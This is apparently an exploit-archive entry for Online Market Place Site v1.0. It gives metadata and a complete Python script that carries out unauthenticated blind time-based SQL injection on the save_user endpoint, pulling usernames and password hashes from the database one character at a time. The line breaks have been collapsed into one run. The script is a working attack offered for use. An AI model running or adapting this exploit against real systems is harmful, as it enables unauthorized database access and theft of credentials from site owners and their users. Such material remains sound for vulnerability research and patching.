Online Market Place Site 1.0 SQL Injection

# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection# Exploit Author: Joe Pollock# Date: September 03, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip# Tested on: Kali Linux, Apache, Mysql# CVE: CVE-2022-30004 (RESERVED)# Vendor: oretnom23# Version: v1.0# Exploit Description:#   Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.#   This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.#   By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.#   Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.#   Ex: python3 omps.py 10.14.14.2import sys, requests, urllib3USERID=0def main():  if len(sys.argv) != 2:    print("(+) usage: %s <target>")  % sys.argv[0]    print('(+) eg: %s 192.168.121.103')  % sys.argv[0]    sys.exit(-1)  ip = sys.argv[1]  print("(+) Retrieving username and hash...")  target = "http://%s/omps/classes/Users.php?f=save_user" % ip    # Get username  for p in range (1,30):    injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)    for c in range(32, 126):      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}      #print(injection_string.replace("[CHAR]", str(c)))      r = requests.post(target, files=files)      if (r.elapsed.total_seconds() > 2):        extracted_char = chr(c)        sys.stdout.write(extracted_char)        sys.stdout.flush()  sys.stdout.write("\t")    # Get password hash  for p in range (1,65):    injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)    for c in range(32, 126):      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}      #print(injection_string.replace("[CHAR]", str(c)))      r = requests.post(target, files=files)      if (r.elapsed.total_seconds() > 2):        extracted_char = chr(c)        sys.stdout.write(extracted_char)        sys.stdout.flush()  print("\n(+) done!")    if __name__ == "__main__":  main()